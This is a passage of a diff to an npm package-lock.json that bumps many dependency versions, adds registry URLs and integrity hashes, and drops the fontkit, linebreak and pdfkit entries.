">=4.0" - }, - "optionalDependencies": { - "source-map": "~0.6.1" + "node": ">=0.4.0" + }, + "optionalDependencies": { + "source-map": "~0.1.30" + } + }, + "node_modules/escodegen/node_modules/esprima": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/esprima/-/esprima-1.0.4.tgz", + "integrity": "sha1-n1V+CPw7TSbs6d00+Pv0drYlha0=", + "dev": true, + "bin": { + "esparse": "bin/esparse.js", + "esvalidate": "bin/esvalidate.js" + }, + "engines": { + "node": ">=0.4.0" + } + }, + "node_modules/escodegen/node_modules/estraverse": { + "version": "1.5.1", + "resolved": "https://registry.npmjs.org/estraverse/-/estraverse-1.5.1.tgz", + "integrity": "sha1-hno+jlip+EYYr7bC3bzZFrfLr3E=", + "dev": true, + "engines": { + "node": ">=0.4.0" + } + }, + "node_modules/escodegen/node_modules/esutils": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/esutils/-/esutils-1.0.0.tgz", + "integrity": "sha1-gVHTWOIMisx/t0XnRywAJf5JZXA=", + "dev": true, + "engines": { + "node": ">=0.10.0" } }, "node_modules/escodegen/node_modules/source-map": { - "version": "0.6.1", + "version": "0.1.43", + "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.1.43.tgz", + "integrity": "sha1-wkvBRspRfBRx9drL4lcbK3+eM0Y=", "dev": true, - "license": "BSD-3-Clause", "optional": true, + "dependencies": { + "amdefine": ">=0.0.4" + }, "engines": { - "node": ">=0.10.0" + "node": ">=0.8.0" } }, "node_modules/eslint-scope": { @@ -7354,8 +7718,9 @@ }, "node_modules/estree-is-function": { "version": "1.0.0", - "dev": true, - "license": "Apache-2.0" + "resolved": "https://registry.npmjs.org/estree-is-function/-/estree-is-function-1.0.0.tgz", + "integrity": "sha512-nSCWn1jkSq2QAtkaVLJZY2ezwcFO161HVc174zL1KPW3RJ+O6C3eJb8Nx7OXzvhoEv+nLgSR1g71oWUHUDTrJA==", + "dev": true }, "node_modules/estree-walker": { "version": "2.0.2", @@ -7379,8 +7744,9 @@ }, "node_modules/event-emitter": { "version": "0.3.5", + "resolved": "https://registry.npmjs.org/event-emitter/-/event-emitter-0.3.5.tgz", + "integrity": "sha1-34xp7vFkeSPHFXuc6DhAYQsCzDk=", "dev": true, - "license": "MIT", "dependencies": { "d": "1", "es5-ext": "~0.10.14" @@ -7388,8 +7754,9 @@ }, "node_modules/event-stream": { "version": "4.0.1", + "resolved": "https://registry.npmjs.org/event-stream/-/event-stream-4.0.1.tgz", + "integrity": "sha512-qACXdu/9VHPBzcyhdOWR5/IahhGMf0roTeZJfzz077GwylcDd90yOHLouhmv7GJ5XzPi6ekaQWd8AvPP2nOvpA==", "dev": true, - "license": "MIT", "dependencies": { "duplexer": "^0.1.1", "from": "^0.1.7", @@ -7653,17 +8020,19 @@ "license": "ISC" }, "node_modules/ext": { - "version": "1.4.0", + "version": "1.6.0", + "resolved": "https://registry.npmjs.org/ext/-/ext-1.6.0.tgz", + "integrity": "sha512-sdBImtzkq2HpkdRLtlLWDa6w4DX22ijZLKx8BMPUuKe1c5lbN6xwQDQCxSfxBQnHZ13ls/FH0MQZx/q/gr6FQg==", "dev": true, - "license": "ISC", "dependencies": { - "type": "^2.0.0" + "type": "^2.5.0" } }, "node_modules/ext/node_modules/type": { - "version": "2.5.0", - "dev": true, - "license": "ISC" + "version": "2.6.0", + "resolved": "https://registry.npmjs.org/type/-/type-2.6.0.tgz", + "integrity": "sha512-eiDBDOmkih5pMbo9OqsqPRGMljLodLcwd5XD5JbtNB0o89xZAwynY9EdCDsJU7LtcVCClu9DvM7/0Ep1hYX3EQ==", + "dev": true }, "node_modules/extend": { "version": "3.0.2", @@ -7768,19 +8137,19 @@ "license": "MIT" }, "node_modules/fast-glob": { - "version": "3.2.5", + "version": "3.2.11", + "resolved": "https://registry.npmjs.org/fast-glob/-/fast-glob-3.2.11.tgz", + "integrity": "sha512-xrO3+1bxSo3ZVHAnqzyuewYT6aMFHRAd4Kcs92MAonjwQZLsK9d0SF1IyQ3k5PoirxTW0Oe/RqFgMQ6TcNE5Ew==", "dev": true, - "license": "MIT", "dependencies": { "@nodelib/fs.stat": "^2.0.2", "@nodelib/fs.walk": "^1.2.3", - "glob-parent": "^5.1.0", + "glob-parent": "^5.1.2", "merge2": "^1.3.0", - "micromatch": "^4.0.2", - "picomatch": "^2.2.1" + "micromatch": "^4.0.4" }, "engines": { - "node": ">=8" + "node": ">=8.6.0" } }, "node_modules/fast-json-stable-stringify": { @@ -7789,8 +8158,9 @@ }, "node_modules/fast-levenshtein": { "version": "2.0.6", - "dev": true, - "license": "MIT" + "resolved": "https://registry.npmjs.org/fast-levenshtein/-/fast-levenshtein-2.0.6.tgz", + "integrity": "sha1-PYpcZog6FqMMqGQ+hR8Zuqd5eRc=", + "dev": true }, "node_modules/fastparse": { "version": "1.1.2", @@ -7834,6 +8204,13 @@ "version": "2.0.5", "license": "MIT" }, + "node_modules/file-uri-to-path": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/file-uri-to-path/-/file-uri-to-path-1.0.0.tgz", + "integrity": "sha512-0Zt+s3L7Vf1biwWZ29aARiVYLx7iMGnEUl9x33fbB/j3jR81u/O2LbqK+Bm1CDSNDKVtJ/YjwY7TUd5SkeLQLw==", + "dev": true, + "optional": true + }, "node_modules/fill-range": { "version": "7.0.1", "license": "MIT", @@ -7919,9 +8296,10 @@ } }, "node_modules/flatted": { - "version": "2.0.2", - "dev": true, - "license": "ISC" + "version": "3.2.5", + "resolved": "https://registry.npmjs.org/flatted/-/flatted-3.2.5.tgz", + "integrity": "sha512-WIWGi2L3DyTUvUrwRKgGi9TwxQMUEqPOPQBVi71R96jZXJdFskXEmf54BoZaS1kknGODoIGASGEzBUYdyMCBJg==", + "dev": true }, "node_modules/flatten": { "version": "1.0.3", @@ -7929,7 +8307,9 @@ "license": "MIT" }, "node_modules/follow-redirects": { - "version": "1.13.0", + "version": "1.14.9", + "resolved": "https://registry.npmjs.org/follow-redirects/-/follow-redirects-1.14.9.tgz", + "integrity": "sha512-MQDfihBQYMcyy5dhRDJUHcw7lb2Pv/TuE6xP1vyraLukNDHKbDxDNaOE3NbCAdKQApno+GPRyo1YAp89yCjK4w==", "dev": true, "funding": [ { @@ -7937,41 +8317,13 @@ "url": "https://github.com/sponsors/RubenVerborgh" } ], - "license": "MIT", "engines": { "node": ">=4.0" - } - }, - "node_modules/fontkit": { - "version": "1.8.1", - "dev": true, - "license": "MIT", - "dependencies": { - "babel-runtime": "^6.26.0", - "brfs": "^2.0.0", - "brotli": "^1.2.0", - "browserify-optional": "^1.0.1", - "clone": "^1.0.4", - "deep-equal": "^1.0.0", - "dfa": "^1.2.0", - "restructure": "^0.5.3", - "tiny-inflate": "^1.0.2", - "unicode-properties": "^1.2.2", - "unicode-trie": "^0.3.0" - } - }, - "node_modules/fontkit/node_modules/pako": { - "version": "0.2.9", - "dev": true, - "license": "MIT" - }, - "node_modules/fontkit/node_modules/unicode-trie": { - "version": "0.3.1", - "dev": true, - "license": "MIT", - "dependencies": { - "pako": "^0.2.5", - "tiny-inflate": "^1.0.0" + }, + "peerDependenciesMeta": { + "debug": { + "optional": true + } } }, "node_modules/for-in": { @@ -8028,8 +8380,23 @@ }, "node_modules/from": { "version": "0.1.7", + "resolved": "https://registry.npmjs.org/from/-/from-0.1.7.tgz", + "integrity": "sha1-g8YK/Fi5xWmXAH7Rp2izqzA6RP4=", + "dev": true + }, + "node_modules/fs-extra": { + "version": "10.0.0", + "resolved": "https://registry.npmjs.org/fs-extra/-/fs-extra-10.0.0.tgz", + "integrity": "sha512-C5owb14u9eJwizKGdchcDUQeFtlSHHthBk8pbX9Vc1PFZrLombudjDnNns88aYslCyF6IY5SUw3Roz6xShcEIQ==", "dev": true, - "license": "MIT" + "dependencies": { + "graceful-fs": "^4.2.0", + "jsonfile": "^6.0.1", + "universalify": "^2.0.0" + }, + "engines": { + "node": ">=12" + } }, "node_modules/fs-minipass": { "version": "2.1.0", @@ -8051,6 +8418,25 @@ "version": "1.0.0", "license": "ISC" }, + "node_modules/fsevents": { + "version": "1.2.13", + "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-1.2.13.tgz", + "integrity": "sha512-oWb1Z6mkHIskLzEJ/XWX0srkpkTQ7vaopMQkyaEIoq0fmtFVxOthb8cCxeT+p3ynTdkk/RZwbgG4brR5BeWECw==", + "deprecated": "fsevents 1 will break on node v14+ and could be using insecure binaries. Upgrade to fsevents 2.", + "dev": true, + "hasInstallScript": true, + "optional": true, + "os": [ + "darwin" + ], + "dependencies": { + "bindings": "^1.5.0", + "nan": "^2.12.1" + }, + "engines": { + "node": ">= 4.0" + } + }, "node_modules/function-bind": { "version": "1.1.1", "license": "MIT" @@ -8103,8 +8489,9 @@ }, "node_modules/get-assigned-identifiers": { "version": "1.2.0", - "dev": true, - "license": "Apache-2.0" + "resolved": "https://registry.npmjs.org/get-assigned-identifiers/-/get-assigned-identifiers-1.2.0.tgz", + "integrity": "sha512-mBBwmeGTrxEMO4pMaaf/uUEFHnYtwr8FTe8Y/mer4rcV/bye0qGm6pw1bGZFGStxC5O76c5ZAVBGnqHmOaJpdQ==", + "dev": true }, "node_modules/get-caller-file": { "version": "2.0.5", @@ -8490,14 +8877,15 @@ } }, "node_modules/http-auth": { - "version": "4.1.7", + "version": "4.1.9", + "resolved": "https://registry.npmjs.org/http-auth/-/http-auth-4.1.9.tgz", + "integrity": "sha512-kvPYxNGc9EKGTXvOMnTBQw2RZfuiSihK/mLw/a4pbtRueTE45S55Lw/3k5CktIf7Ak0veMKEIteDj4YkNmCzmQ==", "dev": true, - "license": "MIT", "dependencies": { "apache-crypt": "^1.1.2", "apache-md5": "^1.0.6", "bcryptjs": "^2.4.3", - "uuid": "^3.4.0" + "uuid": "^8.3.2" }, "engines": { "node": ">=8" @@ -8505,12 +8893,22 @@ }, "node_modules/http-auth-connect": { "version": "1.0.5", + "resolved": "https://registry.npmjs.org/http-auth-connect/-/http-auth-connect-1.0.5.tgz", + "integrity": "sha512-zykAOKpVAXyzhOLm6+xyB/RtRcfN3uDfH4Al73DIfeSb6B7nr0WToLI6UyyM6ohtcLmbBPksWXzVbEDStz8ObQ==", "dev": true, - "license": "MIT", "engines": { "node": ">=8" } }, + "node_modules/http-auth/node_modules/uuid": { + "version": "8.3.2", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz", + "integrity": "sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==", + "dev": true, + "bin": { + "uuid": "dist/bin/uuid" + } + }, "node_modules/http-cache-semantics": { "version": "4.1.0", "dev": true, @@ -8788,24 +9186,28 @@ } }, "node_modules/i18next": { - "version": "20.4.0", + "version": "21.6.11", + "resolved": "https://registry.npmjs.org/i18next/-/i18next-21.6.11.tgz", + "integrity": "sha512-tJ2+o0lVO+fhi8bPkCpBAeY1SgkqmQm5NzgPWCQssBrywJw98/o+Kombhty5nxQOpHtvMmsxcOopczUiH6bJxQ==", "dev": true, - "license": "MIT", + "funding": [ + { + "type": "individual", + "url": "https://locize.com" + }, + { + "type": "individual", + "url": "https://locize.com/i18next.html" + }, + { + "type": "individual", + "url": "https://www.i18next.com/how-to/faq#i18next-is-awesome.-how-can-i-support-the-project" + } + ], "dependencies": { "@babel/runtime": "^7.12.0" } }, - "node_modules/i18next/node_modules/@babel/runtime": { - "version": "7.15.3", - "dev": true, - "license": "MIT", - "dependencies": { - "regenerator-runtime": "^0.13.4" - }, - "engines": { - "node": ">=6.9.0" - } - }, "node_modules/iconv-lite": { "version": "0.4.24", "license": "MIT", @@ -9840,7 +10242,9 @@ "license": "MIT" }, "node_modules/json-schema": { - "version": "0.2.3" + "version": "0.4.0", + "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", + "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" }, "node_modules/json-schema-traverse": { "version": "0.4.1", @@ -9856,8 +10260,9 @@ "license": "MIT" }, "node_modules/json5": { - "version": "2.1.3", - "license": "MIT", + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.0.tgz", + "integrity": "sha512-f+8cldu7X/y7RAJurMEJmdoKXGB/X550w2Nr3tTbezL6RwEE/iMcm+tZnXeoZtKuOq6ft8+CqzEkrIgx1fPoQA==", "dependencies": { "minimist": "^1.2.5" }, @@ -9875,9 +10280,13 @@ "dev": true }, "node_modules/jsonfile": { - "version": "4.0.0", + "version": "6.1.0", + "resolved": "https://registry.npmjs.org/jsonfile/-/jsonfile-6.1.0.tgz", + "integrity": "sha512-5dgndWOriYSm5cnYaJNhalLNDKOqFwyDB/rr1E9ZsGciGvKPs8R2xYGCacuf3z6K1YKDz182fd+fY3cn3pMqXQ==", "dev": true, - "license": "MIT", + "dependencies": { + "universalify": "^2.0.0" + }, "optionalDependencies": { "graceful-fs": "^4.1.6" } @@ -9891,16 +10300,17 @@ "license": "MIT" }, "node_modules/jsprim": { - "version": "1.4.1", - "engines": [ - "node >=0.6.0" - ], - "license": "MIT", + "version": "1.4.2", + "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", + "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", "dependencies": { "assert-plus": "1.0.0", "extsprintf": "1.3.0", - "json-schema": "0.2.3", + "json-schema": "0.4.0", "verror": "1.10.0" + }, + "engines": { + "node": ">=0.6.0" } }, "node_modules/jszip": { @@ -9915,14 +10325,15 @@ } }, "node_modules/karma": { - "version": "6.3.4", + "version": "6.3.16", + "resolved": "https://registry.npmjs.org/karma/-/karma-6.3.16.tgz", + "integrity": "sha512-nEU50jLvDe5yvXqkEJRf8IuvddUkOY2x5Xc4WXHz6dxINgGDrgD2uqQWeVrJs4hbfNaotn+HQ1LZJ4yOXrL7xQ==", "dev": true, - "license": "MIT", "dependencies": { "body-parser": "^1.19.0", "braces": "^3.0.2", "chokidar": "^3.5.1", - "colors": "^1.4.0", + "colors": "1.4.0", "connect": "^3.7.0", "di": "^0.0.1", "dom-serialize": "^2.2.1", @@ -9931,16 +10342,17 @@ "http-proxy": "^1.18.1", "isbinaryfile": "^4.0.8", "lodash": "^4.17.21", - "log4js": "^6.3.0", + "log4js": "^6.4.1", "mime": "^2.5.2", "minimatch": "^3.0.4", + "mkdirp": "^0.5.5", "qjobs": "^1.2.0", "range-parser": "^1.2.1", "rimraf": "^3.0.2", - "socket.io": "^3.1.0", + "socket.io": "^4.2.0", "source-map": "^0.6.1", "tmp": "^0.2.1", - "ua-parser-js": "^0.7.28", + "ua-parser-js": "^0.7.30", "yargs": "^16.1.1" }, "bin": { @@ -10211,8 +10623,9 @@ }, "node_modules/levn": { "version": "0.3.0", + "resolved": "https://registry.npmjs.org/levn/-/levn-0.3.0.tgz", + "integrity": "sha1-OwmSTt+fCDwEkP3UwLxEIeBHZO4=", "dev": true, - "license": "MIT", "dependencies": { "prelude-ls": "~1.1.2", "type-check": "~0.3.2" @@ -10251,38 +10664,6 @@ "node": ">=10" } }, - "node_modules/linebreak": { - "version": "1.0.2", - "dev": true, - "license": "MIT", - "dependencies": { - "base64-js": "0.0.8", - "brfs": "^2.0.2", - "unicode-trie": "^1.0.0" - } - }, - "node_modules/linebreak/node_modules/base64-js": { - "version": "0.0.8", - "dev": true, - "license": "MIT", - "engines": { - "node": ">= 0.4" - } - }, - "node_modules/linebreak/node_modules/pako": { - "version": "0.2.9", - "dev": true, - "license": "MIT" - }, - "node_modules/linebreak/node_modules/unicode-trie": { - "version": "1.0.0", - "dev": true, - "license": "MIT", - "dependencies": { - "pako": "^0.2.5", - "tiny-inflate": "^1.0.0" - } - }, "node_modules/lines-and-columns": { "version": "1.1.6", "dev": true, @@ -10419,24 +10800,26 @@ } }, "node_modules/log4js": { - "version": "6.3.0", + "version": "6.4.1", + "resolved": "https://registry.npmjs.org/log4js/-/log4js-6.4.1.tgz", + "integrity": "sha512-iUiYnXqAmNKiIZ1XSAitQ4TmNs8CdZYTAWINARF3LjnsLN8tY5m0vRwd6uuWj/yNY0YHxeZodnbmxKFUOM2rMg==", "dev": true, - "license": "Apache-2.0", "dependencies": { - "date-format": "^3.0.0", - "debug": "^4.1.1", - "flatted": "^2.0.1", - "rfdc": "^1.1.4", - "streamroller": "^2.2.4" + "date-format": "^4.0.3", + "debug": "^4.3.3", + "flatted": "^3.2.4", + "rfdc": "^1.3.0", + "streamroller": "^3.0.2" }, "engines": { "node": ">=8.0" } }, "node_modules/log4js/node_modules/debug": { - "version": "4.3.2", + "version": "4.3.3", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.3.tgz", + "integrity": "sha512-/zxw5+vh1Tfv+4Qn7a5nsbcJKPaSvCDhojn6FEl9vupwK2VCSDtEiEtqr8DFtzYFOdz63LBkxec7DYuc2jon6Q==", "dev": true, - "license": "MIT", "dependencies": { "ms": "2.1.2" }, @@ -10451,13 +10834,15 @@ }, "node_modules/log4js/node_modules/ms": { "version": "2.1.2", - "dev": true, - "license": "MIT" + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", + "dev": true }, "node_modules/loglevel": { - "version": "1.7.1", + "version": "1.8.0", + "resolved": "https://registry.npmjs.org/loglevel/-/loglevel-1.8.0.tgz", + "integrity": "sha512-G6A/nJLRgWOuuwdNuA6koovfEV1YpqqAG4pRUlFaz3jj2QNZ8M4vBqnVA+HBTmU/AMNUtlOsMmSpF6NyOjztbA==", "dev": true, - "license": "MIT", "engines": { "node": ">= 0.6.0" }, @@ -10618,8 +11003,9 @@ }, "node_modules/map-stream": { "version": "0.0.7", - "dev": true, - "license": "MIT" + "resolved": "https://registry.npmjs.org/map-stream/-/map-stream-0.0.7.tgz", + "integrity": "sha1-ih8HiW2CsQkmvTdEokIACfiJdKg=", + "dev": true }, "node_modules/map-visit": { "version": "1.0.0", @@ -10633,14 +11019,15 @@ } }, "node_modules/marked": { - "version": "2.1.3", + "version": "4.0.12", + "resolved": "https://registry.npmjs.org/marked/-/marked-4.0.12.tgz", + "integrity": "sha512-hgibXWrEDNBWgGiK18j/4lkS6ihTe9sxtV4Q1OQppb/0zzyPSzoFANBa5MfsG/zgsWklmNnhm0XACZOH/0HBiQ==", "dev": true, - "license": "MIT", "bin": { - "marked": "bin/marked" + "marked": "bin/marked.js" }, "engines": { - "node": ">= 10" + "node": ">= 12" } }, "node_modules/mdn-data": { @@ -10967,8 +11354,9 @@ }, "node_modules/morgan": { "version": "1.10.0", + "resolved": "https://registry.npmjs.org/morgan/-/morgan-1.10.0.tgz", + "integrity": "sha512-AbegBVI4sh6El+1gNwvD5YIck7nSA36weD7xvIxG4in80j/UoK8AEGaWnnz8v1GxonMCltmlNs5ZKbGvl9b1XQ==", "dev": true, - "license": "MIT", "dependencies": { "basic-auth": "~2.0.1", "debug": "2.6.9", @@ -10982,8 +11370,9 @@ }, "node_modules/morgan/node_modules/depd": { "version": "2.0.0", + "resolved": "https://registry.npmjs.org/depd/-/depd-2.0.0.tgz", + "integrity": "sha512-g7nH6P6dyDioJogAAGprGpCtVImJhpPk/roCzdb3fIh61/s/nPsfR6onyMwkCAR/OlC3yBC0lESvUoQEAssIrw==", "dev": true, - "license": "MIT", "engines": { "node": ">= 0.8" } @@ -11040,15 +11429,23 @@ "dev": true, "license": "ISC" }, + "node_modules/nan": { + "version": "2.15.0", + "resolved": "https://registry.npmjs.org/nan/-/nan-2.15.0.tgz", + "integrity": "sha512-8ZtvEnA2c5aYCZYd1cvgdnU6cqwixRoYg70xPLWUws5ORTa/lnw+u4amixRS/Ac5U5mQVgp9pnlSUnbNWFaWZQ==", + "dev": true, + "optional": true + }, "node_modules/nanocolors": { "version": "0.1.12", "dev": true, "license": "MIT" }, "node_modules/nanoid": { - "version": "3.1.25", + "version": "3.3.1", + "resolved": "https://registry.npmjs.org/nanoid/-/nanoid-3.3.1.tgz", + "integrity": "sha512-n6Vs/3KGyxPQd6uO0eH4Bv0ojGSUvuLlIHtC3Y0kEO23YRge8H9x1GCzLn28YX0H66pMkxuaeESFq4tKISKwdw==", "dev": true, - "license": "MIT", "bin": { "nanoid": "bin/nanoid.cjs" }, @@ -11123,8 +11520,9 @@ }, "node_modules/next-tick": { "version": "1.0.0", - "dev": true, - "license": "MIT" + "resolved": "https://registry.npmjs.org/next-tick/-/next-tick-1.0.0.tgz", + "integrity": "sha1-yobR/ogoFpsBICCOPchCS524NCw=", + "dev": true }, "node_modules/ngx-cookie-service": { "version": "12.0.3", @@ -11214,8 +11612,9 @@ } }, "node_modules/node-releases": { - "version": "1.1.73", - "license": "MIT" + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.2.tgz", + "integrity": "sha512-XxYDdcQ6eKqp/YjI+tb2C5WM2LgjnZrfYg4vgQt49EK268b6gYCHsBLrK2qvJo4FmCtqmKezb0WZFK4fkrZNsg==" }, "node_modules/nopt": { "version": "5.0.0", @@ -11435,8 +11834,9 @@ }, "node_modules/object-assign": { "version": "4.1.1", + "resolved": "https://registry.npmjs.org/object-assign/-/object-assign-4.1.1.tgz", + "integrity": "sha1-IQmtx5ZYh8/AXLvUQsrIv7s2CGM=", "dev": true, - "license": "MIT", "engines": { "node": ">=0.10.0" } @@ -11520,9 +11920,10 @@ } }, "node_modules/object-inspect": { - "version": "1.8.0", + "version": "1.12.0", + "resolved": "https://registry.npmjs.org/object-inspect/-/object-inspect-1.12.0.tgz", + "integrity": "sha512-Ho2z80bVIvJloH+YzRmpZVQe87+qASmBUKZDWgx9cu+KDrX2ZDH/3tMy+gXbZETVGs2M8YdxObOh7XAtim9Y0g==", "dev": true, - "license": "MIT", "funding": { "url": "https://github.com/sponsors/ljharb" } @@ -11678,8 +12079,9 @@ }, "node_modules/optionator": { "version": "0.8.3", + "resolved": "https://registry.npmjs.org/optionator/-/optionator-0.8.3.tgz", + "integrity": "sha512-+IW9pACdk3XWmmTXG8m3upGUJst5XRGzxMRjXzAuJ1XnIFNvfhjjIuYkDvysnPQ7qzqVzLt78BCruntqRhWQbA==", "dev": true, - "license": "MIT", "dependencies": { "deep-is": "~0.1.3", "fast-levenshtein": "~2.0.6", @@ -12039,6 +12441,12 @@ "node": ">=0.10.0" } }, + "node_modules/path-browserify": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/path-browserify/-/path-browserify-1.0.1.tgz", + "integrity": "sha512-b7uo2UCUOYZcnF/3ID0lulOJi/bafxa1xPe7ZPsammBSpjSWQkjNxlt635YGS2MiR9GjvuXCtz2emr3jbsz98g==", + "dev": true + }, "node_modules/path-dirname": { "version": "1.0.2", "dev": true, @@ -12090,35 +12498,36 @@ }, "node_modules/pause-stream": { "version": "0.0.11", + "resolved": "https://registry.npmjs.org/pause-stream/-/pause-stream-0.0.11.tgz", + "integrity": "sha1-/lo0sMvOErWqaitAPuLnO2AvFEU=", "dev": true, - "license": [ - "MIT", - "Apache2" - ], "dependencies": { "through": "~2.3" } }, - "node_modules/pdfkit": { - "version": "0.12.3", + "node_modules/pdfjs-dist": { + "version": "2.12.313", + "resolved": "https://registry.npmjs.org/pdfjs-dist/-/pdfjs-dist-2.12.313.tgz", + "integrity": "sha512-1x6iXO4Qnv6Eb+YFdN5JdUzt4pAkxSp3aLAYPX93eQCyg/m7QFzXVWJHJVtoW48CI8HCXju4dSkhQZwoheL5mA==", "dev": true, - "license": "MIT", - "dependencies": { - "crypto-js": "^4.0.0", - "fontkit": "^1.8.1", - "linebreak": "^1.0.2", - "png-js": "^1.0.0" + "peerDependencies": { + "worker-loader": "^3.0.8" + }, + "peerDependenciesMeta": { + "worker-loader": { + "optional": true + } } }, "node_modules/pdfmake": { - "version": "0.2.2", + "version": "0.2.4", + "resolved": "https://registry.npmjs.org/pdfmake/-/pdfmake-0.2.4.tgz", + "integrity": "sha512-EM39waHUe/Dg1W9C3XqYbpx6tfhYyU14JHZlI1HaW0AUEY32GbkRBjDLGWo9f7z/k3ea6k1p9yyDrflnvtZS1A==", "dev": true, - "license": "MIT", "dependencies": { "@foliojs-fork/linebreak": "^1.1.1", - "@foliojs-fork/pdfkit": "^0.12.3", + "@foliojs-fork/pdfkit": "^0.13.0", "iconv-lite": "^0.6.3", - "svg-to-pdfkit": "^0.1.8", "xmldoc": "^1.1.2" }, "engines": { @@ -12127,8 +12536,9 @@ }, "node_modules/pdfmake/node_modules/iconv-lite": { "version": "0.6.3", + "resolved": "https://registry.npmjs.org/iconv-lite/-/iconv-lite-0.6.3.tgz", + "integrity": "sha512-4fCk79wshMdzMp2rH06qWrJE4iolqLhCUH+OiuIgU++RB0+94NlDL81atO7GX55uUKueo0txHNtvEyI6D7WdMw==", "dev": true, - "license": "MIT", "dependencies": { "safer-buffer": ">= 2.1.2 < 3.0.0" }, @@ -12216,6 +12626,8 @@ }, "node_modules/png-js": { "version": "1.0.0", + "resolved": "https://registry.npmjs.org/png-js/-/png-js-1.0.0.tgz", + "integrity": "sha512-k+YsbhpA9e+EFfKjTCH3VW6aoKlyNYI6NYdTfDL4CIvFnvsuO84ttonmZE7rc+v23SLTH8XX+5w/Ak9v0xGY4g==", "dev": true }, "node_modules/portfinder": { @@ -13953,6 +14365,8 @@ }, "node_modules/prelude-ls": { "version": "1.1.2", + "resolved": "https://registry.npmjs.org/prelude-ls/-/prelude-ls-1.1.2.tgz", + "integrity": "sha1-IZMqVJ9eUv/ZqCf1cOBL5iqX2lQ=", "dev": true, "engines": { "node": ">= 0.8.0" @@ -14342,8 +14756,9 @@ }, "node_modules/proxy-middleware": { "version": "0.15.0", + "resolved": "https://registry.npmjs.org/proxy-middleware/-/proxy-middleware-0.15.0.tgz", + "integrity": "sha1-o/3xvvtzD5UZZYcqwvYHTGFHelY=", "dev": true, - "license": "MIT", "engines": { "node": ">=0.8.0" } @@ -14429,8 +14844,9 @@ }, "node_modules/quote-stream": { "version": "1.0.2", + "resolved": "https://registry.npmjs.org/quote-stream/-/quote-stream-1.0.2.tgz", + "integrity": "sha1-hJY/jJwmuULhU/7rU6rnRlK34LI=", "dev": true, - "license": "MIT", "dependencies": { "buffer-equal": "0.0.1", "minimist": "^1.1.3", @@ -14551,15 +14967,17 @@ }, "node_modules/regenerate": { "version": "1.4.2", - "dev": true, - "license": "MIT" + "resolved": "https://registry.npmjs.org/regenerate/-/regenerate-1.4.2.tgz", + "integrity": "sha512-zrceR/XhGYU/d/opr2EKO7aRHUeiBI8qjtfHqADTwZd6Szfy16la6kqD0MIUs5z5hx6AaKa+PixpPrR289+I0A==", + "dev": true }, "node_modules/regenerate-unicode-properties": { - "version": "8.2.0", + "version": "10.0.1", + "resolved": "https://registry.npmjs.org/regenerate-unicode-properties/-/regenerate-unicode-properties-10.0.1.tgz", + "integrity": "sha512-vn5DU6yg6h8hP/2OkQo3K7uVILvY4iu0oI4t3HFa81UPkhGJwkRwM10JEc3upjdhHjs/k8GJY1sRBhk5sr69Bw==", "dev": true, - "license": "MIT", "dependencies": { - "regenerate": "^1.4.0" + "regenerate": "^1.4.2" }, "engines": { "node": ">=4" @@ -14611,30 +15029,33 @@ } }, "node_modules/regexpu-core": { - "version": "4.7.1", + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/regexpu-core/-/regexpu-core-5.0.1.tgz", + "integrity": "sha512-CriEZlrKK9VJw/xQGJpQM5rY88BtuL8DM+AEwvcThHilbxiTAy8vq4iJnd2tqq8wLmjbGZzP7ZcKFjbGkmEFrw==", "dev": true, - "license": "MIT", "dependencies": { - "regenerate": "^1.4.0", - "regenerate-unicode-properties": "^8.2.0", - "regjsgen": "^0.5.1", - "regjsparser": "^0.6.4", - "unicode-match-property-ecmascript": "^1.0.4", - "unicode-match-property-value-ecmascript": "^1.2.0" + "regenerate": "^1.4.2", + "regenerate-unicode-properties": "^10.0.1", + "regjsgen": "^0.6.0", + "regjsparser": "^0.8.2", + "unicode-match-property-ecmascript": "^2.0.0", + "unicode-match-property-value-ecmascript": "^2.0.0" }, "engines": { "node": ">=4" } }, "node_modules/regjsgen": { - "version": "0.5.2", - "dev": true, - "license": "MIT" + "version": "0.6.0", + "resolved": "https://registry.npmjs.org/regjsgen/-/regjsgen-0.6.0.tgz", + "integrity": "sha512-ozE883Uigtqj3bx7OhL1KNbCzGyW2NQZPl6Hs09WTvCuZD5sTI4JY58bkbQWa/Y9hxIsvJ3M8Nbf7j54IqeZbA==", + "dev": true }, "node_modules/regjsparser": { - "version": "0.6.9", + "version": "0.8.4", + "resolved": "https://registry.npmjs.org/regjsparser/-/regjsparser-0.8.4.tgz", + "integrity": "sha512-J3LABycON/VNEu3abOviqGHuB/LOtOQj8SKmfP9anY5GfAVw/SPjwzSjxGjbZXIxbGfqTHtJw58C2Li/WkStmA==", "dev": true, - "license": "BSD-2-Clause", "dependencies": { "jsesc": "~0.5.0" }, @@ -14644,6 +15065,8 @@ }, "node_modules/regjsparser/node_modules/jsesc": { "version": "0.5.0", + "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-0.5.0.tgz", + "integrity": "sha1-597mbjXW/Bb3EP6R1c9p9w8IkR0=", "dev": true, "bin": { "jsesc": "bin/jsesc" @@ -14827,14 +15250,6 @@ "node": ">=8" } }, - "node_modules/restructure": { - 